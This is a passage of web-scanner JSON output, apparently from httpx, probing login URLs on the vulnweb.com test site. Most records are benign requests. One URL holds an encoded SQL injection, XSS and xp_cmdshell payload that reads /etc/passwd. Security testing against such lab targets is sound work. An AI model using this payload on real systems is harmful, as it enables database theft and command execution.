Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3282,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.13629392Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1\",\"time\":\"359.364359ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3214,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.138181108Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1\",\"time\":\"358.222061ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3214,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.138181552Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0\",\"time\":\"349.923631ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.148829751Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1\\u0026XNYy=3116%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1\\u0026XNYy=3116%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1\\u0026XNYy=3116%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"354.671502ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3214,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.152750211Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1%29%28%28%29%28.%2C%2C%27%22\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1%29%28%28%29%28.%2C%2C%27%22\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1%29%28%28%29%28.%2C%2C%27%22\",\"time\":\"362.777219ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3274,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.15617422Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1\",\"time\":\"343.311265ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.17756018Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12\",\"time\":\"353.195065ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.177560212Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10\",\"time\":\"355.671945ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.179306756Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11\",\"time\":\"357.087949ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.469367973Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13\",\"time\":\"353.056ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.513824885Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14\",\"time\":\"345.675562ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.557460214Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17\",\"time\":\"349.825437ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.560624497Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15\",\"time\":\"359.062453ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.58816834Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18\",\"time\":\"347.44643ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.701184914Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19\",\"time\":\"346.744139ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.908048195Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2\",\"time\":\"350.585723ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.930621986Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21\",\"time\":\"345.103225ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.944678637Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20\",\"time\":\"361.698959ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.946155196Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22\",\"time\":\"343.87738ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.958910183Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23\",\"time\":\"344.420334ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.96506014Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24\",\"time\":\"349.061485ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.995040941Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25\",\"time\":\"350.365999ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:44.003839154Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27\",\"time\":\"348.524481ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:44.169176895Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28\",\"time\":\"355.487506ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.463213148Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29\",\"time\":\"346.711983ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.467687263Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3\",\"time\":\"348.033416ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.479512137Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31\",\"time\":\"352.712336ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.484975143Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34\",\"time\":\"339.230886ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.48666889Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33\",\"time\":\"344.410928ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.492741957Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35\",\"time\":\"344.138603ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.501018677Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37\",\"time\":\"348.641887ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:53.513136383Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36\",\"title\":\"acuforum 